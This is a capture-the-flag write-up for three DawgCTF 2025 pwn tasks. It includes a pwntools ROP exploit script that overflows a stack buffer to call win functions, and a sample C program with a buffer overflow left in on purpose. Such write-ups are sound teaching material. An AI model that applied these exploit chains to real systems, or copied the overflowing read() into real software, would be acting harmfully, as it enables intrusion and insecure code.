
DawgCTF 2025 - PWN challenges


Introduction

I solved 3 of the 4 tasks, the easy ones. Only task number 4 was not so easy. More info about this CTF is here.


Interns' Project

PWN1 It really was that simple: enter '3' (create an account) followed by '2' (print the flag), as shown below, and the flag is printed. The empty account is enough to pass the permission check, which is the whole bug.
The following are your options:
   1. Say hi
   2. Print the flag
   3. Create an account
Enter option (1-3). Press Enter to submit:
3 2
Enter username:
Enter password:
You entered username:  and password:
However I was just hired and have not learned how to use a database yet....
Here is your flag: DawgCTF{B@d_P3rm1ssi0ns}

The following are your options:
   1. Say hi
   2. Print the flag
   3. Create an account
Enter option (1-3). Press Enter to submit:

DawgCTF{B@d_P3rm1ssi0ns}

Just Parry Lol

PWN2 For an easy advantage, enter AUTOPARRY as your warrior name (the game answers "You feel faster..."), then use a Light Attack, a Parry, and Light Attacks from then on. This trick works surprisingly often. The [DEBUG] lines in the transcript show why: after the name is accepted the player's startup (650) is lower than the bot's (700), so the Light Attack lands first every turn.
$ nc connect.umbccd.net 25699
=== Frame Trap ===
The bot is overwhelming... there's no fair way to win.
Enter your warrior name: AUTOPARRY
AUTOPARRY
You feel faster...
Choose your action:
(1) Heavy Attack
(2) Light Attack
(3) Guard Break
(4) Block
(5) Parry
(6) Dodge
...
Enter choice: 2
Enter choice: 5
Enter choice: 2
Enter choice: 2
Enter choice: 2
Enter choice: 2
Enter choice: 2
...
[TURN 7]
Bot uses: Heavy Attack
You use: Light Attack
[DEBUG] Player startup: 650 (recovery 250 + startup 200 + penalty 200)
[DEBUG] Bot startup: 700 (recovery 267 + startup 433)
You hit the bot for 15 damage. Bot health: 5
Choose your action:
(1) Heavy Attack
(2) Light Attack
(3) Guard Break
(4) Block
(5) Parry
(6) Dodge
Enter choice: 2
2

[TURN 8]
Bot uses: Heavy Attack
You use: Light Attack
[DEBUG] Player startup: 650 (recovery 250 + startup 200 + penalty 200)
[DEBUG] Bot startup: 700 (recovery 267 + startup 433)
You hit the bot for 15 damage. Bot health: -10
You defeated the bot! You win!
DawgCTF{fr4me_d4ta_m4nipulat10n}

DawgCTF{fr4me_d4ta_m4nipulat10n}

64 bits in my Ark and Texture

PWN3 Next up, a simple beginner's task: answer the three questions correctly, then overflow the 'Lesson 1' input to return into the three win functions at the addresses given in the task. The return address sits 152 bytes into the input. win1 takes no arguments, win2 expects one argument in rdi and win3 expects three in rdi, rsi and rdx, so the second and third chains set them up with pop gadgets; the extra ret gadget keeps the stack 16-byte aligned before entering the win function. Each win function prints one fragment of the flag, so I ran the program three times with a different payload each time and pieced the fragments together.
from pwn import *

context.log_level = 'warning'
context.update(arch='x86_64', os='linux')
context.terminal = ['wt.exe', 'wsl.exe']   # WSL under Windows Terminal; adjust for your setup

HOST = "nc connect.umbccd.net 22237"
ADDRESS, PORT = HOST.split()[1:]

BINARY_NAME = "./64bits"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

if args.REMOTE:
    p = remote(ADDRESS, PORT)
else:
    p = process(binary.path)

# Addresses of the three win functions (no PIE, so they are fixed)
win1 = 0x401401
win2 = 0x401314
win3 = 0x4011e6

# Gadgets from the binary itself: win2 takes one argument (rdi),
# win3 takes three (rdi, rsi, rdx); the lone 'ret' keeps the stack
# 16-byte aligned before entering the win function
rop = ROP(binary)
ret = rop.find_gadget(['ret'])[0]
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0]
pop_rdx = rop.find_gadget(['pop rdx', 'ret'])[0]

# Correct quiz answers; a wrong one ends the program before the overflow
p.sendlineafter(b'Question 1:', b'2')
p.sendlineafter(b'Question 2:', b'1')
p.sendlineafter(b'Question 3:', b'4')

# The return address sits 152 bytes into the 'Lesson 1' input
payload1 = flat({152: [ret, win1]})

payload2 = flat({152: [
    pop_rdi, 0xDEADBEEF,
    ret, win2
]})

payload3 = flat({152: [
    pop_rdi, 0xDEADBEEF,
    pop_rsi, 0xDEAFFACE,
    pop_rdx, 0xFEEDCAFE,
    ret, win3
]})

# Run separately, one fragment per run: python3 solve.py [REMOTE] PART=1|2|3
payloads = {1: payload1, 2: payload2, 3: payload3}
p.sendlineafter(b'Lesson 1:', payloads[int(args.PART or 3)])

p.interactive()
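As an added illustration, not the challenge source (which is not on this page), here is a hypothetical C target with the shape the exploit script above assumes: three win functions reached by overwriting the return address, two of them gated on the register arguments 0xDEADBEEF, 0xDEAFFACE and 0xFEEDCAFE, and a fixed stack buffer overrun by read(). The buffer size, the quiz wording and the fragment strings are my assumptions; only the argument values, the answers 2/1/4 and the 152-byte offset come from the script.

```c
/* Hypothetical stand-in for the "64 bits in my Ark and Texture" target.
 * Added example, not the real challenge binary. Built as
 *   gcc -fno-stack-protector -no-pie -o 64bits_like 64bits_like.c
 * it has no canary and fixed addresses, which is what the pwntools
 * script relies on.
 */
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

/* Fragment texts are placeholders, not the real flag. */
int win1(void) {
    puts("fragment 1: <...>");
    return 1;
}

/* Gated on rdi == 0xDEADBEEF, hence the 'pop rdi' gadget in the chain. */
int win2(uint64_t a) {
    if (a != 0xDEADBEEFULL) {
        puts("win2: wrong argument");
        return 0;
    }
    puts("fragment 2: <...>");
    return 1;
}

/* Gated on rdi, rsi and rdx, hence pop rdi / pop rsi / pop rdx. */
int win3(uint64_t a, uint64_t b, uint64_t c) {
    if (a != 0xDEADBEEFULL || b != 0xDEAFFACEULL || c != 0xFEEDCAFEULL) {
        puts("win3: wrong arguments");
        return 0;
    }
    puts("fragment 3: <...>");
    return 1;
}

/* Quiz gate: the answers 2, 1, 4 are the ones the exploit script sends. */
int quiz_ok(int a1, int a2, int a3) {
    return a1 == 2 && a2 == 1 && a3 == 4;
}

/* The vulnerable lesson. Assumed layout: 144-byte buffer, then the saved
 * rbp, then the return address, which gives the 152-byte offset used in
 * the script (a compiler may pad differently). read() accepts 512 bytes,
 * far more than the buffer holds. */
void lesson(void) {
    char buf[144];
    printf("Lesson 1: ");
    fflush(stdout);
    (void)read(0, buf, 0x200);  /* overflow: up to 512 bytes into 144 */
}

int main(void) {
    int ans[3];
    for (int i = 0; i < 3; i++) {
        printf("Question %d: ", i + 1);
        fflush(stdout);
        if (scanf("%d", &ans[i]) != 1)
            return 1;
    }
    if (!quiz_ok(ans[0], ans[1], ans[2])) {
        puts("Wrong.");
        return 1;
    }
    getchar();  /* drop the newline before the raw read */
    lesson();
    return 0;
}
```

The return values of the win functions make the argument gates explicit: running the first chain hits win1 with no setup, while win2 and win3 only print their fragment when the registers hold exactly the values the script pops into them.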

DawgCTF{C0ngR4tul4t10ns_d15c1p13_y0u_4r3_r34dy_2_pwn!}